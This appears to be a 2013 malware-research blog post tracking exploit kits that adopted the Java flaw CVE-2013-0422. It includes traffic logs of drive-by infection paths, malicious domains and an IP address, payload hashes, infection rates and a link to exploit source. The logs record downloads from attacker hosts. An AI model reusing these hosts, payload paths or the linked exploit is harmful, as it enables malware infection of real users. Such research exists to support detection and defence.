Was wondering what to do with that...

Useless video showing live infection (working referrer incl.)

Nuclear Pack :

<edit n 13/01/13 10:00 GMT+1>

<edit 2013-09-06>

And to help figure out, here is what is was on January 5:Payload was mainly (not only cause geo conditioned) Zaccess

SofosFO:

Seems it has just been integrated

SofosFO - CVE-2013-0422 Positive path

ProPack Sploit Pack :

Propack EK CVE-2013-0422 positive Path













</edit n>





<edit n+2 13/01/13 21:00>

Sweet Orange :





Sweet Orange Positive Path on CVE-2013-0422

and Lucky Locker (aka Lyposit) call Home

</edit n+2>





<edit n+1 2012-01-13 - 19h GMT+1>

</edit n+1>





. Found many since 2 days, but first one integrating the CVE.Have been told that it's integrated since at least 2013-01-11GET http://tropical.finale.ceapy-wirealtyseou .org/dank-cashier.html200 OK (text/html)GET http://tropical.finale.ceapy-wirealtyseou .org/psemzhFIKWDhIWDmhwGKhDyFppGwK/QmxmlmQlwUo00/packets.js200 OK (text/html)GET http://tropical.finale.ceapy-wirealtyseou .org/7afdfihFIKWDhIWDmhwGKhDyFppGwy/010922216/terrorist.jar200 OK (application/java-archive)GET http://tropical.finale.ceapy-wirealtyseou .org/7afdfihFIKWDhIWDmhwGKhDyFppGwy/010922216/terrorist.jar200 OK (application/java-archive) c1638d5ee237fc3228121b389d1cd3b0 GET http://tropical.finale.ceapy-wirealtyseou .org/7afdfihFIKWDhIWDmhwGKhDyFppGwy/010922216/4393992200 OK (application/octet-stream)Thanks to to @switchingtoguns for that one.GET http://46.30.42 .195/build2/doc/4yioqp.php200 OK (text/html)GET http://46.30.42 .195/build2/doc/axhncumubx.php?k=32203313104201200 OK (application/java-archive)GET http://46.30.42 .195/build2/doc/gneyipb.php?k=32203313104201200 OK (application/java-archive)GET http://46.30.42 .195/build2/doc/jxipmwgoksgu.php?k=32203313104201200 OK (text/html) -GET http://46.30.42 .195/build2/doc/4mx57e.php?j=1&k=1200 OK (application/octet-stream) ac91753182db3a9562a27bd78c95972e ZaccessSofosFO Fiddler File: http://goo.gl/CB5mb GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/plugins.php?arrowwiki=988&profile=193&scripts=194&users=78&baseball=950&movies=698&photoshop=16200 OK (text/html)GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/wLsShgHc200 OK (application/x-java-archive)GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/Fxptg200 OK (application/x-java-archive)GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/wLsShgHc200 OK (application/x-java-archive)GET http://fluorescentgrandfather .info/2008/meta_login/phpmyadmin2/Fxptg200 OK (application/x-java-archive)GET http://rubefasttrack .info/products.php?info=53&mapa=334&classes=12&pages=677&sport=1251&hotel=81&free=178&intl=58&style=604&openparadise1=299200 OK (application/octet-stream)GET http://b4wd52ftevtwvd .org/ad4/?jlrhg=rFssAhgRAFQ4SDEAAQAAAAUQ1KCkeEiX200 OK (application/octet-stream) (Lyposit/Lucky Locker call home)SWT Fiddler file : http://goo.gl/4cDMy Have seens some stats from an EK featuring this CVE. % of successful infection was between 13-15% overall (double usual rates on that EK). In DK it seems the % is higher. From 25% to 30%. Have been told that one explanation could be that Banks require Java to login in that countrySource of the Exploit : http://pastebin.com/raw.php?i=cUG2ayjh - Gdark - DamageLabs